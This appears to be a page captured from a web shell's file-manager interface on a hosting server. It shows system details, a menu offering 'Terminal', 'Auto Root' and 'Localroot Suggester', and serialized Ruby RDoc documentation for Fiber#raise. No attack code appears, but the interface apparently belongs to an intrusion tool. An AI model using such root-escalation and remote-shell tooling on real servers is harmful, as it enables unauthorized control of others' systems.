Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
Fiber /
Delete
Unzip
Name
Size
Permission
Date
Action
Pool
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Scheduler
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
%5b%5d%3d-c.ri
533
B
-rw-r--r--
2026-04-07 17:22
%5b%5d-c.ri
508
B
-rw-r--r--
2026-04-07 17:22
alive%3f-i.ri
458
B
-rw-r--r--
2026-04-07 17:22
backtrace-i.ri
1.59
KB
-rw-r--r--
2026-04-07 17:22
backtrace_locations-i.ri
857
B
-rw-r--r--
2026-04-07 17:22
blocking%3f-c.ri
908
B
-rw-r--r--
2026-04-07 17:22
blocking%3f-i.ri
749
B
-rw-r--r--
2026-04-07 17:22
blocking-c.ri
513
B
-rw-r--r--
2026-04-07 17:22
cdesc-Fiber.ri
3.94
KB
-rw-r--r--
2026-04-07 17:22
current-c.ri
410
B
-rw-r--r--
2026-04-07 17:22
current_scheduler-c.ri
474
B
-rw-r--r--
2026-04-07 17:22
inspect-i.ri
235
B
-rw-r--r--
2026-04-07 17:22
kill-i.ri
953
B
-rw-r--r--
2026-04-07 17:22
new-c.ri
1.96
KB
-rw-r--r--
2026-04-07 17:22
raise-i.ri
1.41
KB
-rw-r--r--
2026-04-07 17:22
resume-i.ri
887
B
-rw-r--r--
2026-04-07 17:22
schedule-c.ri
1.62
KB
-rw-r--r--
2026-04-07 17:22
scheduler-c.ri
626
B
-rw-r--r--
2026-04-07 17:22
set_scheduler-c.ri
972
B
-rw-r--r--
2026-04-07 17:22
storage%3d-i.ri
1.01
KB
-rw-r--r--
2026-04-07 17:22
storage-i.ri
400
B
-rw-r--r--
2026-04-07 17:22
to_s-i.ri
232
B
-rw-r--r--
2026-04-07 17:22
transfer-i.ri
3.7
KB
-rw-r--r--
2026-04-07 17:22
yield-c.ri
616
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI" raise:ETI"Fiber#raise;TF:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [ I"ERaises an exception in the fiber at the point at which the last ;TI"H+Fiber.yield+ was called. If the fiber has not been started or has ;TI"Ealready run to completion, raises +FiberError+. If the fiber is ;TI"Myielding, it is resumed. If it is transferring, it is transferred into. ;TI"0But if it is resuming, raises +FiberError+.;To:RDoc::Markup::BlankLine o; ; [ I"HWith no arguments, raises a +RuntimeError+. With a single +String+ ;TI"Qargument, raises a +RuntimeError+ with the string as a message. Otherwise, ;TI"Kthe first parameter should be the name of an +Exception+ class (or an ;TI"Hobject that returns an +Exception+ object when sent an +exception+ ;TI"Nmessage). The optional second parameter sets the message associated with ;TI"Qthe exception, and the third parameter is an array of callback information. ;TI"NExceptions are caught by the +rescue+ clause of <code>begin...end</code> ;TI"blocks.;T@o; ; [I"LRaises +FiberError+ if called on a Fiber belonging to another +Thread+.;T: @fileI"cont.c;T:0@omit_headings_from_table_of_contents_below0I"�fiber.raise -> obj fiber.raise(string) -> obj fiber.raise(exception [, string [, array]]) -> obj ;T0[ I"(*args);T@ FI" Fiber;TcRDoc::NormalClass00